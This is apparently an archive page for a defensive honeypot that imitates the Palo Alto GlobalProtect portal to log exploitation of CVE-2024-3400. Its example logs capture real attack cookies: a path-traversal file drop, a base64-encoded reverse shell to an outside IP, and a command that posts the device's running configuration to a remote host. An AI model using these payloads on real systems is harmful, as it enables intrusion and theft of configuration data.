Associated Vulnerability
Description
Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability
Readme
# CVE-2024-3400-pot
Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability.
# Features
* Simulate when visiting the `/global-protect/login.esp` (login page of the GlobalProtect Portal)
* Simulate HTTP request `POST /ssl-vpn/hipreport.esp` & `Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/<file>;`
* Extract the filename from the cookie (if present)
* Save the content of the POST request to the file
* Simulate if user requested `GET /global-protect/portal/images/<file>`, user will receive `403` instead of `404`
* Collect IP & User-Agent of the request
# Prerequisites
* Python 3.x installed on your server.
* Python PIP
* pip install flask
* Generate a self-signed certificate and private key with OpenSSL:
```
$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:XX
State or Province Name (full name) []:XX
Locality Name (eg, city) [Default City]:
Organization Name (eg, company) [Default Company Ltd]:XX
Organizational Unit Name (eg, section) []:XX
Common Name (eg, your name or your server's hostname) []:XX
Email Address []:XX
```
* Remove the Passphrase from the Private Key:
```
$ openssl rsa -in key.pem -out key1.pem
Enter pass phrase for key.pem:
writing RSA key
$ mv key1.pem key.pem
```
# Usage
To start the honeypot, run the following command:
```
sudo nohup python3 CVE-2024-3400-pot.py &
disown
```
* Check if the script is running or not:
```
sudo netstat -lnput | grep 443
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 1208/python3
sudo ps aux | grep <PID>
sonic 1208 0.0 3.5 189448 34364 pts/0 S 00:35 0:17 python3 CVE-2024-3400-pot.py
```
# Example Logs
```
INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on https://127.0.0.1:443
* Running on https://<IP>:443
INFO:werkzeug:Press CTRL+C to quit
INFO:root:Request from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36, Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/rdpj22uy8h.txt;
WARNING:root:Detected suspicious file creation attempt: rdpj22uy8h.txt from 45.61.138.35
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
WARNING:root:Suspicious file requested - rdpj22uy8h.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:werkzeug:45.61.138.35 - - [23/Apr/2024 01:31:56] "GET /global-protect/portal/images/rdpj22uy8h.txt HTTP/1.1" 403 -
WARNING:root:Suspicious file requested - rdpj22uy8h_test.txt from 45.61.138.35, User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
INFO:root:Request from 158.255.213.74, User-Agent: python-requests/2.25.1, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTguMjU1LjIxMy43NC82MDU0NCAwPiYx|base64${IFS}-d|bash`
INFO:werkzeug:158.255.213.74 - - [23/Apr/2024 04:46:48] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
INFO:root:Request from 92.119.159.68, User-Agent: curl/7.58.0, Cookie: SESSID=/../../../../opt/panlogs/tmp/device_telemetry/minute/aaba`echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgb3M7IG9zLnBvcGVuKCJjdXJsIC1rIC1YIFBPU1QgLWQgQC9vcHQvcGFuY2ZnL21nbXQvc2F2ZWQtY29uZmlncy9ydW5uaW5nLWNvbmZpZy54bWwgaHR0cHM6Ly8xODUuMTA0LjE5NC40NzoxMDAwMiIpJw==|base64${IFS}-d|bash`
INFO:werkzeug:92.119.159.68 - - [24/Apr/2024 15:17:45] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 -
```
File Snapshot
[4.0K] /data/pocs/816e47672cac81602c6207befff778f0dcd3118e
├── [ 20K] CVE-2024-3400-pot.py
├── [4.0K] global-protect
│ └── [4.0K] portal
│ ├── [4.0K] css
│ │ ├── [152K] bootstrap.min.css
│ │ ├── [ 532] ie10-viewport-bug-workaround.css
│ │ ├── [ 10K] latofonts.css
│ │ └── [ 22K] login.css
│ ├── [4.0K] images
│ │ ├── [540K] bg.png
│ │ ├── [2.5K] favicon.ico
│ │ ├── [8.7K] logo-pan-48525a.png
│ │ └── [ 12K] logo-pan-48525a.svg
│ └── [4.0K] js
│ ├── [ 662] ie10-viewport-bug-workaround.js
│ └── [ 87K] jquery.min.js
├── [1.0K] LICENSE
├── [4.2K] README.md
└── [4.0K] suspicious_files
└── [ 1] rdpj22uy8h.txt
6 directories, 14 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →